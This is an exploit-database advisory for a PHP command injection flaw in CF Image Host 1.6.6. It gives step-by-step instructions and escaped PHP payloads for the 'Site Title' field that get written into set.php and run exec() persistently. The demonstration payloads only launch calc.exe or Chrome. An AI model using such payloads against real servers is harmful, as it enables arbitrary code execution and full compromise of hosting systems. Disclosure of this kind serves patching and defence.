[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CF Image Host 1.6.6 Command Injection Vulnerability

Author
hyp3rlinx
Risk
[
Security Risk High
]
0day-ID
0day-ID-24551
Category
web applications
Date add
16-11-2015
Platform
php
CF Image Host 1.6.6 Command Injection Vulnerability

Vendor:
====================================
codefuture.co.uk/projects/imagehost


Product:
===================================
CF Image Host 1.65 - 1.6.6

Archive download listed as: version 1.65
unzips as imagehost 1.6.6


Vulnerability Type:
=====================
PHP Command Injection


Vulnerability Details:
=====================

CF Imagehost allows users who have access to the management area the
ability to write directly to the 'set.php' page under
the /inc directory that stores setting values for the 'Site Title', 'Site
Slogan' etc, this allows a local attacker ability to
inject specially crafted PHP command payloads to execute arbitrary
operating system commands on the victim host. Possibly leading
to privilege escalation, RFI, backdoors etc.. and most likely full
compromise of the affected system or shared environment
if applicable.



PHP Command Injection Exploit code(s):
=====================================

Under the setting tab we can inject following below PHP code and it will
remain persistent as it is written disk in 'set.php',
afterwards when the victim visits the application and click a tab the
persistent OS command will be executed.


1) navigate to CF image host settings tab
http://localhost/imagehost1.6.6/admin.php?act=set
2) click on admin menu on left and enter your passwords DO NOT click 'Save
changes' yet! or you get error message to enter creds
3) now go back to settings tab and click 'General' then inject below PHP
code into the 'Site Title' input field
4) now click 'Save Changes', this code will get stored under  /inc
directory within the 'set.php' PHP file.

our PHP injection payload needs the single quotes, double back slashes,
semicolons as described below to correctly escape the syntax
so we do not break the PHP page and cause errors, our extra \\ quoutes and
; gets removed after injection takes place.

some examples...


';echo exec("c:\\Windows\\system32\\calc.exe");'';';

'set.php' on line 11 then becomes:
$settings['SET_TITLE'] = '';echo
exec("c:\Windows\system32\calc.exe");'';';';

OR inject CMD to launch chrome.exe etc...

';echo exec("c:\\Program Files
(x86)\\Google\\Chrome\\Application\\chrome.exe");'';';


After, click on some tabs above like 'Database' or 'Ban User' and Tada!
this will execute our stored PHP command...
either running calc.exe or launching Google Chrome.


Description:
================================================================

Request Method(s):            [+] POST
Vulnerable Product:           [+] CF Image Host 1.65 - 1.6.6
Vulnerable Parameter(s):      [+] 'Site Title', 'Site Slogan' etc..
Affected Area(s):             [+]  OS

#  0day.today [2024-12-25]  #